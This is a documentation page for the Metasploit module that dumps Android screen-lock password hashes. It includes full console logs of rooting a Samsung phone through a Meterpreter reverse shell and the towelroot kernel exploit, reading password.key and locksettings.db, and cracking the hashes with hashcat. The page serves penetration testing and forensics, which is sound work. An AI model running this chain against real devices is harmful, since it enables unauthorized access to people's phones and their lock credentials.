Android Gather Dump Password Hashes for Android Systems - Metasploit
This page contains detailed information about how to use the post/android/gather/hashdump metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Android Gather Dump Password Hashes for Android Systems
Module: post/android/gather/hashdump
Source code: modules/post/android/gather/hashdump.rb
Disclosure date: -
Last modification time: 2019-11-17 13:44:19 +0000
Supported architecture(s): -
Supported platform(s): Android
Target service / protocol: -
Target network port(s): -
List of CVEs: -
Post Module to dump the password hashes for Android System. Root is required. To perform this operation, two things are needed. First, a password.key file is required as this contains the hash but no salt. Next, a sqlite3 database is needed (with supporting files) to pull the salt from. Combined, this creates the hash we need. Samsung based devices change the hash slightly.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/android/gather/hashdump
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/android/gather/hashdump
msf post(hashdump) > show options
... show and set options ...
msf post(hashdump) > set SESSION session-id
msf post(hashdump) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/android/gather/hashdump")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Description
Post Module to dump the password hashes for Android System. Root is required. To perform this operation, two things are needed. First, a password.key file is required as this contains the hash but no salt. Next, a sqlite3 database is needed (with supporting files) to pull the salt from. Combined, this creates the hash we need. This can be cracked with Hashcat, mode 5800. Samsung devices only have SHA1 hashes, while most other Android devices also have an MD5 hash.
A PIN is simply an all digit password.
A Pattern lock is also an all digit password where each dot is represented by a number.
1 2 3
4 5 6
7 8 9
Verification Steps
- Get root on an Android device
- Start msfconsole
- Do:
use post/android/gather/hashdump
- Do:
set session [session]
- Do:
run
- You should get a password hash to crack.
Scenarios
Passworded - Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)
Using towelroot
to get root. Device is set to use Password as the screen lock. Password is test
.
resource (android.128.rb)> use exploit/multi/handler
resource (android.128.rb)> set payload android/meterpreter_reverse_tcp
payload => android/meterpreter_reverse_tcp
resource (android.128.rb)> set lport 9999
lport => 9999
resource (android.128.rb)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (android.128.rb)> setg verbose true
verbose => true
resource (android.128.rb)> run
[*] Started reverse TCP handler on 111.111.1.111:9999
[*] Meterpreter session 1 opened (111.111.1.111:9999 -> 222.222.2.222:42547) at 2019-10-27 20:48:49 -0400
WARNING: Local file /root/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
WARNING: Local files may be incompatible with the Metasploit Framework
meterpreter > background
[*] Backgrounding session 1...
resource (android.128.rb)> use towelroot
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/android/local/futex_requeue 2014-05-03 excellent Yes Android 'Towelroot' Futex Requeue Kernel Exploit
[*] Using exploit/android/local/futex_requeue
resource (android.128.rb)> set session 1
session => 1
resource (android.128.rb)> run
[*] Started reverse TCP handler on 111.111.1.111:4444
[+] Android version 4.4.2 appears to be vulnerable
[*] Found device: d2vzw
[*] Fingerprint: Verizon/d2vzw/d2vzw:4.4.2/KOT49H/I535VRUDNE1:user/release-keys
[*] Using target: New Samsung
[*] Loading exploit library /data/data/com.metasploit.stage/files/vnytm
[*] Loaded library /data/data/com.metasploit.stage/files/vnytm, deleting
[*] Waiting 300 seconds for payload
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (904600 bytes) to 222.222.2.222
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:51741) at 2019-10-27 20:49:34 -0400
meterpreter > background
[*] Backgrounding session 2...
resource (android.128.rb)> use post/android/gather/hashdump
resource (android.128.rb)> set session 2
session => 2
resource (android.128.rb)> run
[!] SESSION may not be compatible with this module.
[*] Attempting to determine unsalted hash
[+] Saved password.key
[*] Attempting to determine salt
[*] OS Version: 4.4.2
[*] Attempting to load >=4.3.0 Android settings file
[+] Saved locksettings.db with length 4096
[+] Saved locksettings.db-wal with length 140112
[+] Saved locksettings.db-shm with length 32768
[+] Password Salt: 4aafc54dc502e88b
[+] SHA1: EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b
[+] Crack with: hashcat -m 5800 EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b
[*] Post module execution completed
msf5 post(android/gather/hashdump) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
222.222.2.222 EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b Nonreplayable hash android-sha1
We can now crack the password with hashcat as per the last line.
# hashcat -m 5800 EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b --show
ea8457de97836c955082ae77dbe2cd86a4e8bc0e:4aafc54dc502e88b:test
PIN - Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)
Using towelroot
to get root. Device is set to use PIN as the screen lock. Password is 1234
.
resource (android.128.rb)> use exploit/multi/handler
resource (android.128.rb)> set payload android/meterpreter_reverse_tcp
payload => android/meterpreter_reverse_tcp
resource (android.128.rb)> set lport 9999
lport => 9999
resource (android.128.rb)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (android.128.rb)> setg verbose true
verbose => true
resource (android.128.rb)> run
[*] Started reverse TCP handler on 111.111.1.111:9999
[*] Meterpreter session 1 opened (111.111.1.111:9999 -> 222.222.2.222:39987) at 2019-10-27 21:04:57 -0400
WARNING: Local file /root/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
WARNING: Local files may be incompatible with the Metasploit Framework
meterpreter > background
[*] Backgrounding session 1...
resource (android.128.rb)> use towelroot
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/android/local/futex_requeue 2014-05-03 excellent Yes Android 'Towelroot' Futex Requeue Kernel Exploit
[*] Using exploit/android/local/futex_requeue
resource (android.128.rb)> set session 1
session => 1
resource (android.128.rb)> run
[*] Started reverse TCP handler on 111.111.1.111:4444
[+] Android version 4.4.2 appears to be vulnerable
[*] Found device: d2vzw
[*] Fingerprint: Verizon/d2vzw/d2vzw:4.4.2/KOT49H/I535VRUDNE1:user/release-keys
[*] Using target: New Samsung
[*] Loading exploit library /data/data/com.metasploit.stage/files/rlotf
[*] Loaded library /data/data/com.metasploit.stage/files/rlotf, deleting
[*] Waiting 300 seconds for payload
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (904600 bytes) to 222.222.2.222
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:57268) at 2019-10-27 21:05:25 -0400
meterpreter > background
[*] Backgrounding session 2...
resource (android.128.rb)> use post/android/gather/hashdump
resource (android.128.rb)> set session 2
session => 2
resource (android.128.rb)> run
[!] SESSION may not be compatible with this module.
[*] Attempting to determine unsalted hash
[+] Saved password.key
[*] Attempting to determine salt
[*] OS Version: 4.4.2
[*] Attempting to load >=4.3.0 Android settings file
[+] Saved locksettings.db with length 4096
[+] Saved locksettings.db-wal with length 206032
[+] Saved locksettings.db-shm with length 32768
[+] Password Salt: 4aafc54dc502e88b
[+] SHA1: 9E201EFFCC29C8F54E1ECEC307CB1DA18B6B6E6B:4aafc54dc502e88b
[+] Crack with: hashcat -m 5800 9E201EFFCC29C8F54E1ECEC307CB1DA18B6B6E6B:4aafc54dc502e88b
[*] Post module execution completed
We can now crack the password with hashcat as per the last line.
# hashcat -m 5800 9E201EFFCC29C8F54E1ECEC307CB1DA18B6B6E6B:4aafc54dc502e88b -a 3 ?d?d?d?d
hashcat (v5.1.0) starting...
...
Approaching final keyspace - workload adjusted.
9e201effcc29c8f54e1ecec307cb1da18b6b6e6b:4aafc54dc502e88b:1234
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Samsung Android Password/PIN
Hash.Target......: 9e201effcc29c8f54e1ecec307cb1da18b6b6e6b:4aafc54dc502e88b
Time.Started.....: Sun Oct 27 21:06:04 2019 (0 secs)
Time.Estimated...: Sun Oct 27 21:06:04 2019 (0 secs)
Guess.Mask.......: ?d?d?d?d [4]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 41481 H/s (0.31ms) @ Accel:32 Loops:15 Thr:1024 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 1000/10000 (10.00%)
Rejected.........: 0/1000 (0.00%)
Restore.Point....: 0/1000 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1020-1023
Candidates.#1....: 1234 -> 1764
Hardware.Mon.#1..: Temp: 54c Util:100% Core: 705MHz Mem:1400MHz Bus:16
Started: Sun Oct 27 21:06:00 2019
Stopped: Sun Oct 27 21:06:05 2019
Go back to menu.
Msfconsole Usage
Here is how the android/gather/hashdump post exploitation module looks in the msfconsole:
msf6 > use post/android/gather/hashdump
msf6 post(android/gather/hashdump) > show info
Name: Android Gather Dump Password Hashes for Android Systems
Module: post/android/gather/hashdump
Platform: Android
Arch:
Rank: Normal
Provided by:
h00die
timwr
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Description:
Post Module to dump the password hashes for Android System. Root is
required. To perform this operation, two things are needed. First, a
password.key file is required as this contains the hash but no salt.
Next, a sqlite3 database is needed (with supporting files) to pull
the salt from. Combined, this creates the hash we need. Samsung
based devices change the hash slightly.
References:
https://www.pentestpartners.com/security-blog/cracking-android-passwords-a-how-to/
https://hashcat.net/forum/thread-2202.html
Module Options
This is a complete list of options available in the android/gather/hashdump post exploitation module:
msf6 post(android/gather/hashdump) > show options
Module options (post/android/gather/hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Advanced Options
Here is a complete list of advanced options supported by the android/gather/hashdump post exploitation module:
msf6 post(android/gather/hashdump) > show advanced
Module advanced options (post/android/gather/hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the android/gather/hashdump module can do:
msf6 post(android/gather/hashdump) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the android/gather/hashdump post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(android/gather/hashdump) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Unable to read <L>
Here is a relevant code snippet related to the "Unable to read <L>" error message:
44: next
45: end
46: f = file_name + ext
47: data = read_file(l)
48: if data.blank?
49: print_error("Unable to read #{l}")
50: return
51: end
52: print_good("Saved #{f} with length #{data.length}")
53:
54: if ext == ''
This module requires root permissions.
Here is a relevant code snippet related to the "This module requires root permissions." error message:
68: SQLite3::Database.new(db_loot_name)
69: end
70:
71: def run
72: unless is_root?
73: fail_with Failure::NoAccess, 'This module requires root permissions.'
74: end
75:
76: manu = cmd_exec("getprop ro.product.manufacturer")
77:
78: print_status('Attempting to determine unsalted hash.')
No password.key file, no password on device.
Here is a relevant code snippet related to the "No password.key file, no password on device." error message:
76: manu = cmd_exec("getprop ro.product.manufacturer")
77:
78: print_status('Attempting to determine unsalted hash.')
79: key_file = '/data/system/password.key'
80: unless file_exist?(key_file)
81: print_error('No password.key file, no password on device.')
82: return
83: end
84:
85: hash = read_file(key_file)
86: if hash.empty?
Unable to read <KEY_FILE>, and retrieve hash.
Here is a relevant code snippet related to the "Unable to read <KEY_FILE>, and retrieve hash." error message:
82: return
83: end
84:
85: hash = read_file(key_file)
86: if hash.empty?
87: print_error("Unable to read #{key_file}, and retrieve hash.")
88: return
89: end
90: store_loot('Key', 'plain/text', session, hash, 'password.key', 'Android password hash key')
91: print_good('Saved password.key')
92:
Could not find <LOCKSETTINGS_DB>, using settings.db
Here is a relevant code snippet related to the "Could not find <LOCKSETTINGS_DB>, using settings.db" error message:
95: vprint_status("OS Version: #{os}")
96:
97: locksettings_db = '/data/system/locksettings.db'
98: locksettings_sql = "select value from locksettings where name='lockscreen.password_salt';"
99: unless file_exist? locksettings_db
100: vprint_status("Could not find #{locksettings_db}, using settings.db")
101: locksettings_db = '/data/data/com.android.providers.settings/databases/settings.db'
102: locksettings_sql = "select value from secure where name='lockscreen.password_salt';"
103: end
104:
105: begin
Unable to load settings.db file.
Here is a relevant code snippet related to the "Unable to load settings.db file." error message:
104:
105: begin
106: vprint_status("Attempting to load lockscreen db: #{locksettings_db}")
107: db = read_store_sql(locksettings_db)
108: if db.nil?
109: print_error('Unable to load settings.db file.')
110: return
111: end
112: salt = db.execute(locksettings_sql)
113: rescue SQLite3::SQLException
114: print_error("Failed to pull salt from database. Command output: #{salt}")
Failed to pull salt from database. Command output: <SALT>
Here is a relevant code snippet related to the "Failed to pull salt from database. Command output: <SALT>" error message:
109: print_error('Unable to load settings.db file.')
110: return
111: end
112: salt = db.execute(locksettings_sql)
113: rescue SQLite3::SQLException
114: print_error("Failed to pull salt from database. Command output: #{salt}")
115: return
116: end
117:
118: salt = salt[0][0] # pull string from results Command output: [["5381737017539487883"]] may also be negative.
119:
Go back to menu.
Related Pull Requests
- #12593 Merged Pull Request: fixes for android hashdump
- #12497 Merged Pull Request: Android hashdumper
References
- CVE: Not available
- https://www.pentestpartners.com/security-blog/cracking-android-passwords-a-how-to/
- https://hashcat.net/forum/thread-2202.html
See Also
Check also the following modules related to this module:
Authors
- h00die
- timwr
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.